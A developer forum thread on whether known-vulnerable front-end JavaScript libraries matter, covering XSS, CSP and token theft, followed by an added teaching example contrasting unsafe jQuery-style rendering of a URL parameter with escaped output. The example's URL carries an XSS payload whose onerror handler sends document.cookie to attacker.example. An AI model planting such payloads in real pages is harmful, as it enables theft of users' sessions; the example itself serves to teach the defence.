by merb 3137 days ago
> One of the discoveries the report mentions is that an analysis of around 433,000 sites found that 77% of them use at least one front-end JavaScript library with a known security vulnerability.

Does that even matter? No Front-End JS Library should actually make your backend vulnerable.

4 comments

An XSS issue could make your users' data vulnerable.
But CORS[0] headers can mitigate some of the risk?

[0]: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS

You want CSP headers to mitigate XSS risks.
Not really. CORS headers are set by the destination of the XHR. In the case of XSS it would be an attacker controlled server used to exfiltrate user cookies, etc.
Your backend should be double-checking any escaping the frontend does.

Otherwise you can throw your fancy anti-XSS on the frontend in the bin.

Also CSP helps.

Is still only an issue if you pass untrusted data to your JS code.
And there is a pretty good chance of that happening in most JS projects.

Anywhere you take or show input from the user (an input box, a URL query, displaying data stored by some other system on the DB, etc...) could be a vector for an XSS attack.

And it's not just data passed to JS, but data passed to HTML or any data that could make its way into CSS in many cases!

Turns out that most of the time, untrusted user-supplied data slips through JS code: https://www.owasp.org/index.php/Top_10_2017-Top_10
> No Front-End JS Library should actually make your backend vulnerable.

FUD. Most SPAs keep the authentication token accessible to JavaScript so it can be sent to the API server. And XSS in the FE JS can permit an attacker to steal the user's authentication token and then the attacker could impersonate the user and take any action as the user.

Vulnerabilities don't have to affect the backend - most of the jQuery-related CVEs that I could find had to do with XSS.
Which can only happen if you pass wrong data from the backend to the jQuery-related function, i.e. dynamically generate input for $()...
Well, not really backend-exclusive: `$('#foo').append('Showing search results for ' + (new URL(location)).searchParams.get('search'));`
Only if your front end is an SPA and the backend just serves data via an API. Even in that case, XSS in the front end can compromise an admin's web session to pivot into backend services.
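The search-banner snippet and the "dynamically generated input for $()" point from the last few comments, as an added example that is not from the thread or from any of its commenters: the vulnerable rendering path beside the escaped one, with the markup returned as a string so it can be checked outside a browser, plus an approximation of the rule jQuery 1.9+ uses to decide whether a string passed to $() is HTML or a selector. The page URL, the hostile query value and the function names are constructed for the demonstration; the jQuery rule is a simplification of its quick-expression check, not jQuery's own code.

```javascript
// Added example, not code from the original thread. Node-runnable model of a
// DOM-based XSS through a URL query parameter and its escaped counterpart.

// Constructed page URL whose "search" parameter carries an injected tag that
// would exfiltrate document.cookie if it were parsed as HTML.
const PAGE_URL = 'https://shop.example/results?search=' +
  encodeURIComponent('<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">');

// Minimal HTML escaping for text placed inside an element body or attribute value.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: mirrors $('#foo').append('Showing search results for ' + term).
// jQuery's .append()/.html() parse the concatenated string as HTML, so any
// markup in the query parameter becomes live DOM and the onerror handler fires.
function bannerUnsafe(pageUrl) {
  const term = new URL(pageUrl).searchParams.get('search') || '';
  return '<div id="foo">Showing search results for ' + term + '</div>';
}

// Hardened: the same text escaped before it reaches the HTML parser, which is
// what $('#foo').text(...) or element.textContent do for you.
function bannerSafe(pageUrl) {
  const term = new URL(pageUrl).searchParams.get('search') || '';
  return '<div id="foo">Showing search results for ' + escapeHtml(term) + '</div>';
}

// Check used by the tests: does the rendered banner contain a tag the
// developer did not write?
function containsInjectedTag(html) {
  const inner = html.replace(/^<div id="foo">/, '').replace(/<\/div>$/, '');
  return /<[a-z]/i.test(inner);
}

// Approximation of how jQuery 1.9+ decides that a string given to $() is HTML
// rather than a selector: it must start with "<" (after optional whitespace)
// and contain a ">". Older jQuery treated a "<" anywhere in the string as HTML,
// which is why $(location.hash) was exploitable. Assumed simplification, not
// jQuery's own regex.
function jqueryTreatsAsHtml(str) {
  return /^\s*<[\s\S]+>/.test(str);
}

// Usage: the unsafe banner carries the injected <img>, the safe one does not.
console.log(bannerUnsafe(PAGE_URL));
console.log(bannerSafe(PAGE_URL));
console.log(jqueryTreatsAsHtml('<img src=x onerror=alert(1)>'), jqueryTreatsAsHtml('#foo'));
```

The backend-side escaping the thread recommends is the same transformation applied before the data is stored or returned from the API; doing it in both places means a single missed call site on the front end does not turn a stored value into executable markup.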